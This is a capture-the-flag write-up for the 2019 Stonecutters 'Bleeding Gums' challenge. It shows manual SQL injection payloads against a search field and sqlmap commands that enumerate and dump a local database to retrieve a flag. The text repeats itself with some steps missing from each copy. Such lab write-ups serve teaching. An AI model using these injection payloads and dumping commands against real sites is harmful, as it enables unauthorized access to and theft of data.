2019 Stonecutters - Bleeding Gums
In honor of Bleeding Gums Murphy, who passed away 24 years ago today; I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutter's "Bleeding Gums"challenge.
Bleeding Gums was an empty website aside from a single search field as seen below:
index.php
When I searched for the letter "a", I saw the table below:
When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.
Next, I searched for years and album titles but the query only seemed to search for Artists.
Searching for ' gave me the following SQL error:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1
I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.
With this particular challenge, I noticed that -- and # would cause the error messages to be different. For example, ' OR 1=1 -- would return blank page, but 'OR 1=1 # would give me this error:
Error: Got error 'missing ) at offset 4' from regexp
The injection was obviously missing a ) so I added it to various places in the query and played with the 1=1 test and I found that ")' or 1=1 # " would return the full table of Artists.
At this point I felt that it was worth trying sqlmap again. I always first confirm that sqlmap will work for my purposes by using the --current-user option as seen in my command below:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --current-user
This was successful and returned the following information:
<snip>
[21:57:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[21:57:32] [INFO] fetching current user
current user: 'ctf@localhost'
[21:57:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
<snip>
I next did a -a. No flag was discovered in this output, or I otherwise overlooked it, but I did notice another database called "ctf." Using sqlmap, I stepped through identifying what databases existed and what tables they had.
First, I used --dbs to show me the available databases:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --dbs
[*] information_schema
[*] test
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" -T "Secrets" --dump
Which presented me with the flag:
Database: ctf
Table: Secrets
[1 entry]
+-------------------------------------+
| secret |
+-------------------------------------+
| flag{SelmaSmokesJazzCigarettes} |
+-------------------------------------+
Another fun SQli challenge. sqlmap is such a powerful tool, it's easy to throw it at something and expect magic to happen. That's not always the case so when you see errors - keep trying!
RIP Bleeding Gums
Bleeding Gums was an empty website aside from a single search field as seen below:
index.php
When I searched for the letter "a", I saw the table below:
Search Results
When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.
Next, I searched for years and album titles but the query only seemed to search for Artists.
Searching for ' gave me the following SQL error:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1
I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.
With this particular challenge, I noticed that -- and # would cause the error messages to be different. For example, ' OR 1=1 -- would return blank page, but 'OR 1=1 # would give me this error:
Error: Got error 'missing ) at offset 4' from regexp
The injection was obviously missing a ) so I added it to various places in the query and played with the 1=1 test and I found that ")' or 1=1 # " would return the full table of Artists.
At this point I felt that it was worth trying sqlmap again. I always first confirm that sqlmap will work for my purposes by using the --current-user option as seen in my command below:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --current-user
This was successful and returned the following information:
<snip>
[21:57:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[21:57:32] [INFO] fetching current user
current user: 'ctf@localhost'
[21:57:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
<snip>
First, I used --dbs to show me the available databases:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --dbs
<snip>
[*] ctf[*] information_schema
[*] test
<snip>
The CTF database stuck out as this was after all, a CTF, so I then used SQLmap to dump the tables for that database:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --tables -D "ctf"
<snip>
Database: ctf
[2 tables]
+---------+
| Albums |
| Secrets |
+---------+
<snip>
Secrets looked super interesting so I then dumped the table entries for the "Secrets" table:
Which presented me with the flag:
Database: ctf
Table: Secrets
[1 entry]
+-------------------------------------+
| secret |
+-------------------------------------+
| flag{SelmaSmokesJazzCigarettes} |
+-------------------------------------+
Another fun SQli challenge. sqlmap is such a powerful tool, it's easy to throw it at something and expect magic to happen. That's not always the case so when you see errors - keep trying!
-strupo_
